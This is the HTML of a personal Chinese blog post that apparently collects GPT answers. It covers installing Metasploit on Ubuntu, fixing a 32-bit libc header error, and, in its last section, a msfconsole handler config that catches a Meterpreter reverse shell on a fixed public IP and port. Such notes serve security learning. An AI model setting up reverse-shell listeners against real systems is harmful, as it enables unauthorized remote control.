<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>GPT的回复集 | 大嗨阔(成长度1%)</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","search":{"preload":true,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: 'confirm'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);document.addEventListener('pjax:success', _ => bszCaller.fetch(
 "//busuanzi.ibruce.info/busuanzi?jsonpCallback=BusuanziCallback", a => {
  bszTag.texts(a),
  bszTag.shows()
}));reset()})</script><meta name="generator" content="Hexo 7.0.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/links/"><span class="navItemTitle">Links</span></a></li><li class="navItem"><a class="navBlock" href="/about/"><span class="navItemTitle">About</span></a></li><li class="navItem"><a class="navBlock" href="/games/"><span class="navItemTitle">Games</span></a></li><li class="navItem"><a class="navBlock" href="/daohang/"><span class="navItemTitle">导航</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>GPT的回复集</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2023-12-25T05:18:44.000Z" id="date"> 2023-12-25</time></div></span><br><span>Last Update: <div class="control"><time datetime="2023-12-25T05:22:12.603Z" id="updated"> 2023-12-25</time></div></span><br><span>Word Count: <div class="control">777</div></span><br><span>Read Time: <div class="control">3 min</div></span><br><span id="busuanzi_container_page_pv">Page View: <span class="control" id="busuanzi_value_page_pv">loading...</span></span></div></div><hr><div id="post-content"><h1 id="安装msf"><a href="#安装msf" class="headerlink" title="安装msf"></a>安装msf</h1><p>要在 Ubuntu 上下载 Metasploit Framework（msfconsole），你可以按照以下步骤进行操作：</p>
<ol>
<li><p>打开终端：在 Ubuntu 上，你可以使用快捷键 <code>Ctrl + Alt + T</code> 打开终端。</p>
</li>
<li><p>更新软件包列表：在终端中运行以下命令，以确保你的软件包列表是最新的：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">sudo apt update<br></code></pre></td></tr></table></figure>
</li>
<li><p>安装依赖项：运行以下命令安装 Metasploit Framework 的依赖项：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">sudo apt install curl gnupg2 apt-transport-https<br></code></pre></td></tr></table></figure>
</li>
<li><p>导入 Metasploit 的 GPG 密钥：运行以下命令导入 Metasploit 的 GPG 密钥：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">curl https://apt.metasploit.com/metasploit-framework.gpg.key | sudo gpg --dearmor --output /etc/apt/trusted.gpg.d/metasploit-framework.gpg<br></code></pre></td></tr></table></figure>
</li>
<li><p>添加 Metasploit 的 APT 存储库：运行以下命令添加 Metasploit 的 APT 存储库：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">echo &quot;deb [arch=amd64] https://apt.metasploit.com/ lucid main&quot; | sudo tee /etc/apt/sources.list.d/metasploit-framework.list<br></code></pre></td></tr></table></figure>
</li>
<li><p>更新软件包列表：再次运行以下命令更新软件包列表：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">sudo apt update<br></code></pre></td></tr></table></figure>
</li>
<li><p>安装 Metasploit Framework：运行以下命令安装 Metasploit Framework：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">sudo apt install metasploit-framework<br></code></pre></td></tr></table></figure>

<p>这将下载并安装 Metasploit Framework 及其相关组件。</p>
</li>
</ol>
<p>安装完成后，你可以在终端中运行 <code>msfconsole</code> 命令来启动 Metasploit Framework 的控制台。</p>
<p>请注意，Metasploit Framework 是一个强大的安全工具，使用时需要遵守法律和道德规范。确保你在合法和授权的范围内使用它，并且仅针对你有权限进行测试和评估的目标。</p>
<h1 id="32位程序libc库"><a href="#32位程序libc库" class="headerlink" title="32位程序libc库"></a>32位程序libc库</h1><p>要解决这个问题，你可以尝试以下几个步骤：</p>
<ol>
<li><p>安装开发包：首先，确保你的系统上已经安装了 C 标准库的开发包。在大多数 Linux 发行版中，你可以使用包管理器来安装这些开发包。例如，在 Ubuntu 上，你可以运行以下命令安装 <code>libc6-dev</code> 包：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">sudo apt-get install libc6-dev<br></code></pre></td></tr></table></figure>

<p>如果你使用的是其他 Linux 发行版，请查阅相应的文档以了解如何安装 C 标准库的开发包。</p>
</li>
<li><p>检查编译选项：确保你的编译命令中包含了正确的选项和路径。特别是，你需要确保 <code>-I</code> 选项指定了正确的标准库路径。例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">gcc -I /usr/include myfile.c -o myfile<br></code></pre></td></tr></table></figure>

<p>如果你的标准库路径不同，请相应地修改上述命令。</p>
</li>
<li><p>更新编译器：如果你使用的是旧版本的编译器，尝试更新到最新版本。新版本的编译器通常会修复一些错误和缺陷，并提供更好的兼容性。</p>
</li>
<li><p>检查文件位置：如果你确定 <code>bits/libc-header-start.h</code> 文件确实存在于你的系统中，但编译器无法找到它，你可以尝试手动指定文件的路径。例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">gcc -I /path/to/bits myfile.c -o myfile<br></code></pre></td></tr></table></figure>

<p>将 <code>/path/to/bits</code> 替换为实际文件所在的路径。</p>
</li>
</ol>
<p>如果你尝试了以上步骤仍然无法解决问题，我建议提供更多关于你的编译环境和编译命令的详细信息，这样我可以更具体地帮助你解决问题。</p>
<h1 id="msf接受反弹shell"><a href="#msf接受反弹shell" class="headerlink" title="msf接受反弹shell"></a>msf接受反弹shell</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">use exploit/multi/handler<br>set PAYLOAD linux/x86/meterpreter/reverse_tcp<br>set LHOST 47.99.105.206<br>set LPORT 8020<br>show options #查漏补缺<br>exploit<br></code></pre></td></tr></table></figure>

<div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/12/02/%E7%88%AC%E8%99%AB%E5%8F%8Aexcel%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C/">爬虫及excel文件操作 Prev →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="/favicon.ico" alt="Logo"></a><h1 id="Dr"><a href="/">heshi906</a></h1><div id="description"><p>大概只有漫不经心 才是唯一的解药</p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/heshi906"><i class="fab fa-github" alt="GitHub"></i></a></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AE%89%E8%A3%85msf"><span class="toc-number">1.</span> <span class="toc-text">安装msf</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#32%E4%BD%8D%E7%A8%8B%E5%BA%8Flibc%E5%BA%93"><span class="toc-number">2.</span> <span class="toc-text">32位程序libc库</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#msf%E6%8E%A5%E5%8F%97%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">3.</span> <span class="toc-text">msf接受反弹shell</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>